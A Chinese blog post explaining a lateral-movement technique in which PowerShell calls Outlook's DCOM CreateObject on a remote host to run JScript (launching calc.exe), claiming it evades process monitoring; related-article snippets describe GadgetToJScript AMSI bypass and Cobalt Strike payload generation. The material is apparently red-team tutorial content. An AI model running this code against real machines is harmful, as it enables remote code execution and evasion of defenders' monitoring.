使用Outlook的CreateObject方法和DotNetToJScript横向渗透

最新推荐文章于 2024-11-19 11:16:37 发布
最新推荐文章于 2024-11-19 11:16:37 发布
阅读量693 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 心情杂货铺 文章标签: 横向渗透 Outlook DCOM 绕过EDR
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cssxn/article/details/100084044
本文介绍如何利用Powershell调用Outlook的DCOM组件执行JS脚本,实现远程控制任务,如运行calc.exe。此方法绕过常规监控,不留下明显日志痕迹,适合高级渗透测试或自动化办公场景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原理:通过powershell调用Outlook的DCOM组件,可以执行js脚本,原文中的demo是结合DotNetToJScript框架+C#程序来做的,我这里比较懒,直接用js写的脚本。

由于是COM调用,所以进程链关系不会关联到powershell。通过Process Monitor等工具也监控不到相关日志。

运行效果图:
在这里插入图片描述

Powershell代码:

$com = [Type]::GetTypeFromProgID('Outlook.Application’,’这里替换成你的IP’)
$object = [System.Activator]::CreateInstance($com)
$RemoteScriptControl = $object.CreateObject(“ScriptControl”)
$RemoteScriptControl.Language = “JScript”
$code = "var ax = new ActiveXObject('Wscript.Shell');ax.run('calc.exe',0)"
$RemoteScriptControl.AddCode($code)

参考资料:https://posts.specterops.io/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript-a88a81df27eb

6. 使用createComponentcreateObject动态加载组件
山间点烟雨
01-07 628
当某一个自定义控件会被多次重复使用时,可利用此方法动态生成组件实例,对其进行生成销毁,以提升软件运行性能。
DotNetToJScriptMini:DotNetToJScript的简化版本,用于创建一个JScript文件,该文件从内存中加载.NET v2程序集
03-04
DotNetToJScriptMini DotNetToJScript的简化(抽象)版本,用于创建从内存加载.NET v2程序集的JScript文件。 我创建此脚本是为了简化对DotNetToJScript工作原理的理解。 用法 [*] Usage: DotNetToJScriptMini.exe <ASSEMBLY> <CLASSNAME> [OUTPUTJS] 例子: DotNetToJScriptMini.exe .\ExampleAssembly.dll TestClass mini.js
一种新的攻击方式:使用Outlook 表单进行横向渗透常驻
weixin_33901926的博客
09-13 501
本文讲的是一种新的攻击方式:使用Outlook 表单进行横向渗透常驻, 背景 最近我们针对CrowdStrike服务进行例行调查,发现了一种攻击方法,其主要用于横向渗透系统常驻,而且是以前我们没有看到过的。这种攻击利用Microsoft Outlook中的自定义表单(而不是宏),只需打开或预览电子邮件就会允许Visual Basic代码在系统上执行...
JavaScript 之 Object.create()方法使用
weixin_43971228的博客
06-05 292
Object.create()方法 Object.create()方法创建一个新对象,使用现有的对象来提供新创建的对象的__proto__。 语法:Object.create(proto, [propertiesObject]) proto:新创建对象的原型对象。 propertiesObject:可选。若没有指定为 undefined,则是要添加到新创建对象的可枚举属性(即其自身定义的属性,而...
探索DotNetToJScript:将.NET程序转换为JScript的神奇工具
gitblog_00008的博客
05-14 509
探索DotNetToJScript:将.NET程序转换为JScript的神奇工具 DotNetToJScriptA tool to create a JScript file which loads a .NET v2 assembly from memory.项目地址:https://gitcode.com/gh_mirrors/do/DotNetToJScript 在现代软件开发中,利用各种...
DotNetToJScript 项目使用教程
gitblog_00075的博客
08-10 399
DotNetToJScript 项目使用教程 DotNetToJScriptA tool to create a JScript file which loads a .NET v2 assembly from memory.项目地址:https://gitcode.com/gh_mirrors/do/DotNetToJScript 1. 项目的目录结构及介绍 DotNetToJScript...
VBS中CreateObjectWScript.CreateObject的区别介绍
09-05
在VBScript(VBS)编程中,`CreateObject` `WScript.CreateObject` 都是用来实例化ActiveX对象的方法,但它们之间存在一些微妙的差异。这些差异主要体现在它们的来源、使用场景以及功能特性上。 首先,`...
CreateObject(Excel.Application)报错解决方法-win10.rar
04-30
在提供的压缩包中,`CreateObject(Excel.Application)报错解决方法-win10.jpg`可能是一张图片,展示了具体的解决步骤或错误截图;`CreateObject(Excel.Application)报错解决方法-win10.txt`可能包含了更详细的步骤...
利用ASP发送接收XML数据的处理方法与代码
10-30
### 利用ASP发送接收XML数据的处理方法与代码 ...需要注意的是,虽然本文介绍的方法对于老版本的ASP仍然有效,但在实际项目中,建议考虑使用更现代的技术栈,如ASP.NET Core等,以获得更好的性能安全性。
Java使用反射调用方法示例
08-25
使用反射可以实现很多高级功能,比如动态调用对象的方法、动态访问设置属性、动态创建对象等。本篇文章主要介绍如何在Java中使用反射调用方法,并提供实例代码供读者参考。 首先,反射机制的核心类是java.lang....
GadgetTo[removed]用于生成 .NET 序列化小工具的工具,当使用来自基于 JSVBSVBA 的脚本的 BinaryFormatter 反序列化时,该工具可以触发 .NET 程序集加载执行
08-04
描述 用于生成 .NET 序列化小工具的工具,当使用来自 JS/VBS/VBA 脚本的 BinaryFormatter 进行反序列化时,可以触发 .NET 程序集加载/执行。 当前的小工具在使用来自 jscript/vbscript/vba 的 BinaryFormatter 反序列化时会触发对 Activator.CreateInstance() 的调用,这意味着它可用于通过默认/公共构造函数触发您选择的 .NET 程序集的执行。 该工具的创建主要用于为 RT 参与(初始访问、横向移动、持久性)自动化 WSH 脚本武器化,用于 PoC 的 shellcode 加载器被删除并替换为在 TestAssembly 项目中实现的示例程序集。 细节: 无需更新 AmsiEnable 注册表项或劫持加载库 (AMSI.dll) 即可绕过 AMSI。 绕过 .NET 4.8+ 新引入的用于阻止“A
AggressiveGadgetTo[removed]Cobalt Strike Aggressor脚本以生成GadgetToJScript有效负载
04-23
AggressiveGadgetToJScript 我们创建了这个攻击者脚本,以便使用GadgetToJScript技术自动生成有效载荷。 出于此发行版的目的,我们使用了一个通用的注入器,该注入器实现了QueueUserAPC注入方法,并注入了notepad.exe。 随意使用自己的模板。 此外,生成的shellcode在用于进样器模板之前已被压缩。 用法 安装mono框架: apt install mono-complete 。 在GadgetToJScript.cna设置路径变量: $toolpath是安装目录的绝对路径。 $outpath是用于输出所有生成的工件的目录。 $python3是python3二进制文件的绝对路径。 $gzip是gzip二进制文件的绝对路径。 $mcs是mcs二进制文件的绝对路径。 将cna加载到CobaltStrike中。 将会出现
一种用于创建JScript文件的工具,该文件将从内存中加载.NET v2程序集。-.NET开发
05-27
此文件是DotNetToJScript的一部分-DotNetToJScript的一种工具,该工具可生成引导任意.NET程序集类的JScript。 版权所有(C)James Forshaw 2017 DotNetToJScript是免费软件:您可以在以下位置重新分发/或修改它:``此文件是DotNetToJScript的一部分-一种生成JScript的工具,该JScript引导任意.NET程序集类。 版权所有(C)James Forshaw 2017 DotNetToJScript是免费软件:您可以根据自由软件基金会发布的GNU通用公共许可证的条款(许可证的第3版)重新分发/或修改它。 )的任何更高版本。 分发DotNetToJScript的目的是希望它会有用,但没有任何担保;
使用DotNetToJScript实现.NET到JScript的转换
gitblog_00900的博客
08-10 378
使用DotNetToJScript实现.NET到JScript的转换 DotNetToJScriptA tool to create a JScript file which loads a .NET v2 assembly from memory.项目地址:https://gitcode.com/gh_mirrors/do/DotNetToJScript 项目介绍 DotNetToJScrip...
js调用outlook
newton21012915
01-14 759
window.open("mailto:liu@gmail.com?subject=测试");
Scripting.Dictionary对象
无轩居 (Home of vip)
01-09 1979
   许多Microsoft的编程语言,如Visual Basic、VBScriptJscript,都提供集合(collection)。可以把集合想象为数组,可以使用其中内建的函数完成存储操纵数据等基本任务。无须担心数据是在哪些行列,而是使用唯一的键进行访问。    VBScriptJscript都提供类似的对象,通称Scripting.Dictionary对象或Dictionary对象。它
GadgetToJScript工具分析及使用
Snake_74的博客
04-03 1427
文章目录0x1 介绍0x2 代码结构0x3 实现逻辑0x4 利用分析0x5 使用方式0x6 参考链接 0x1 介绍 GadgetToJScript工具能够将.Net程序封装在js或vbs脚本中,相比于James Forshaw开源的DotNetToJScript,修改了反序列化调用链,能够绕过AMSI,添加了绕过.Net 4.8+阻止Assembly.Load的功能。 该工具生成.NET序列化的小...
winexec函数 执行powershell 脚本_丢掉 Powershell.exe 来渗透测试
weixin_39953100的博客
12-01 315
0x00 前言作为一个 pentest,真的是不需要 Powershell 吗?如果是,我真的会觉得不可思议。但是,如果是因为某些策略,阻止了你对 powershell.exe 的访问,那该怎么办?宾果,你想对了,有好几个众所周知的解决方案,在本文中,我们使用 C# 程序集来执行我们的powershell脚本。首先,我们为什么可以不使用powershell.exe来执行.ps1...
DotNetToJScript 项目常见问题解决方案
最新发布
gitblog_00736的博客
11-19 651
DotNetToJScript 项目常见问题解决方案 DotNetToJScript A tool to create a JScript file which loads a .NET v2 assembly from memory. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值